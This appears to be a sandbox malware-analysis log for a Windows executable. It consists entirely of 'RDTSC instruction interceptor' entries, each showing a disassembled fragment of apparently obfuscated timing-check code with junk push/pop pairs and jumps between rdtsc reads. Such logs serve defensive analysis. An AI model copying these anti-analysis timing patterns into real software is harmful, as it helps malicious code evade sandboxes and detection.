Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F2504 second address: 13F254D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F49E4E2C448h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F49E4E2C444h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jng 00007F49E4E2C438h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F254D second address: 13F2551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F406A second address: 13F4075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4075 second address: 13F4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4079 second address: 13F4091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Eh 0x00000007 jnc 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4091 second address: 13F40AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F49E47F2146h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40AB second address: 13F40C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Ah 0x00000007 jnc 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40C7 second address: 13F40CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40CB second address: 13F40CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40CF second address: 13F40EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2151h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F49E47F214Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F40EE second address: 13F40F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F3BE8 second address: 13F3BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CCA second address: 13F5CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CCE second address: 13F5CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CD4 second address: 13F5CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F5CDA second address: 13F5D31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a ja 00007F49E47F2146h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F49E47F2152h 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F49E47F2158h 0x00000022 push eax 0x00000023 pop eax 0x00000024 popad 0x00000025 push ebx 0x00000026 jc 00007F49E47F2146h 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 jno 00007F49E47F2146h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0076 second address: 76F00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 jmp 00007F49E4E2C442h 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edi, 769E5694h 0x00000013 mov edi, 63544800h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F49E4E2C442h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F00B1 second address: 76F00C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F00C3 second address: 76F010D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F49E4E2C447h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F49E4E2C446h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F49E4E2C43Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F010D second address: 76F011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F011F second address: 76F017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F49E4E2C448h 0x00000012 or eax, 663B9FC8h 0x00000018 jmp 00007F49E4E2C43Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F49E4E2C448h 0x00000024 xor cl, 00000028h 0x00000027 jmp 00007F49E4E2C43Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F017F second address: 76F0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0185 second address: 76F0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0189 second address: 76F023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [76EB06ECh] 0x00000011 jmp 00007F49E47F2156h 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F49E47F214Eh 0x0000001f and eax, 1C5AB6E8h 0x00000025 jmp 00007F49E47F214Bh 0x0000002a popfd 0x0000002b jmp 00007F49E47F2158h 0x00000030 popad 0x00000031 jne 00007F49E47F30B6h 0x00000037 jmp 00007F49E47F2150h 0x0000003c xchg eax, edi 0x0000003d jmp 00007F49E47F2150h 0x00000042 push eax 0x00000043 jmp 00007F49E47F214Bh 0x00000048 xchg eax, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F49E47F2155h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F023E second address: 76F0244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0244 second address: 76F0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0248 second address: 76F024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F024C second address: 76F02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76E80B60h] 0x0000000e mov eax, 7617E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F49E47F2155h 0x0000001b adc al, 00000026h 0x0000001e jmp 00007F49E47F2151h 0x00000023 popfd 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 push 00000044h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F49E47F2159h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F02A7 second address: 76F032A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C447h 0x00000009 or si, D9BEh 0x0000000e jmp 00007F49E4E2C449h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F49E4E2C449h 0x00000022 or ecx, 06A036A6h 0x00000028 jmp 00007F49E4E2C441h 0x0000002d popfd 0x0000002e mov esi, 0D08F9D7h 0x00000033 popad 0x00000034 xchg eax, edi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov eax, 72E91D65h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F032A second address: 76F036A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F49E47F2152h 0x00000008 and ecx, 57142778h 0x0000000e jmp 00007F49E47F214Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ah, 5Eh 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F49E47F2151h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F036A second address: 76F0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0370 second address: 76F0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0374 second address: 76F0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03D9 second address: 76F03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03DD second address: 76F03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03E3 second address: 76F03F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F03F2 second address: 76F040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F49E4E2C440h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F040E second address: 76F045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8504h 0x00000007 pushfd 0x00000008 jmp 00007F49E47F214Dh 0x0000000d sbb si, A846h 0x00000012 jmp 00007F49E47F2151h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test esi, esi 0x0000001d jmp 00007F49E47F214Eh 0x00000022 je 00007F4A53F313A1h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edx, ax 0x0000002e mov cx, 33F5h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F045E second address: 76F0497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F49E4E2C43Fh 0x00000010 mov dword ptr [esi], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F49E4E2C445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0497 second address: 76F0500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E47F2157h 0x00000009 xor ch, FFFFFFEEh 0x0000000c jmp 00007F49E47F2159h 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+04h], eax 0x0000001b jmp 00007F49E47F214Ah 0x00000020 mov dword ptr [esi+08h], eax 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 jmp 00007F49E47F214Ah 0x0000002b popad 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov dx, 79AEh 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0500 second address: 76F057A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F49E4E2C440h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F49E4E2C43Dh 0x0000001d add ax, F896h 0x00000022 jmp 00007F49E4E2C441h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F49E4E2C440h 0x0000002e add esi, 626728B8h 0x00000034 jmp 00007F49E4E2C43Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F057A second address: 76F05A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05A0 second address: 76F05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05A4 second address: 76F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05AA second address: 76F05F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C440h 0x00000009 or eax, 1B504D78h 0x0000000f jmp 00007F49E4E2C43Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+14h], eax 0x0000001d jmp 00007F49E4E2C442h 0x00000022 mov eax, dword ptr [ebx+54h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05F3 second address: 76F05F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05F7 second address: 76F05FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F05FD second address: 76F0632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c pushad 0x0000000d mov si, 4E4Dh 0x00000011 mov ax, 8249h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+58h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F49E47F214Bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0632 second address: 76F06CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C43Fh 0x00000009 jmp 00007F49E4E2C443h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F49E4E2C448h 0x00000015 adc esi, 1B6DEE28h 0x0000001b jmp 00007F49E4E2C43Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 pushad 0x00000028 mov eax, 2B8FE63Bh 0x0000002d pushfd 0x0000002e jmp 00007F49E4E2C440h 0x00000033 add ax, A088h 0x00000038 jmp 00007F49E4E2C43Bh 0x0000003d popfd 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+5Ch] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F49E4E2C445h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F06CD second address: 76F0719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c jmp 00007F49E47F214Eh 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 jmp 00007F49E47F2150h 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 mov dh, 27h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+64h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0719 second address: 76F071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F071D second address: 76F0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0721 second address: 76F0727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0727 second address: 76F072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F072D second address: 76F0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0731 second address: 76F0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2150h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F49E47F214Eh 0x00000015 or ecx, 27F74538h 0x0000001b jmp 00007F49E47F214Bh 0x00000020 popfd 0x00000021 mov ebx, esi 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+68h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0778 second address: 76F077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F077E second address: 76F0827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F49E47F2154h 0x00000008 pop ecx 0x00000009 mov bx, 2686h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+2Ch], eax 0x00000013 jmp 00007F49E47F214Dh 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F49E47F214Ch 0x00000023 and ax, C128h 0x00000028 jmp 00007F49E47F214Bh 0x0000002d popfd 0x0000002e mov esi, 3E09061Fh 0x00000033 popad 0x00000034 mov word ptr [esi+30h], ax 0x00000038 jmp 00007F49E47F2152h 0x0000003d mov ax, word ptr [ebx+00000088h] 0x00000044 pushad 0x00000045 mov al, DEh 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007F49E47F2159h 0x0000004f or al, FFFFFFA6h 0x00000052 jmp 00007F49E47F2151h 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0827 second address: 76F0847 instructions: 0x00000000 rdtsc 0x00000002 call 00007F49E4E2C440h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0847 second address: 76F084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F084B second address: 76F084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F084F second address: 76F0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0855 second address: 76F0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C440h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0869 second address: 76F08B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007F49E47F2157h 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 jmp 00007F49E47F2156h 0x0000001b mov eax, dword ptr [ebx+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, F650h 0x00000025 mov al, dl 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F08B4 second address: 76F091E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d mov ax, C47Bh 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+1Ch] 0x00000017 jmp 00007F49E4E2C43Ah 0x0000001c mov dword ptr [esi+3Ch], eax 0x0000001f jmp 00007F49E4E2C440h 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F49E4E2C43Dh 0x00000030 adc ax, EAE6h 0x00000035 jmp 00007F49E4E2C441h 0x0000003a popfd 0x0000003b mov ax, 8917h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F091E second address: 76F095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F49E47F214Fh 0x0000000b and cx, 261Eh 0x00000010 jmp 00007F49E47F2159h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+40h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F095E second address: 76F0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0962 second address: 76F0968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
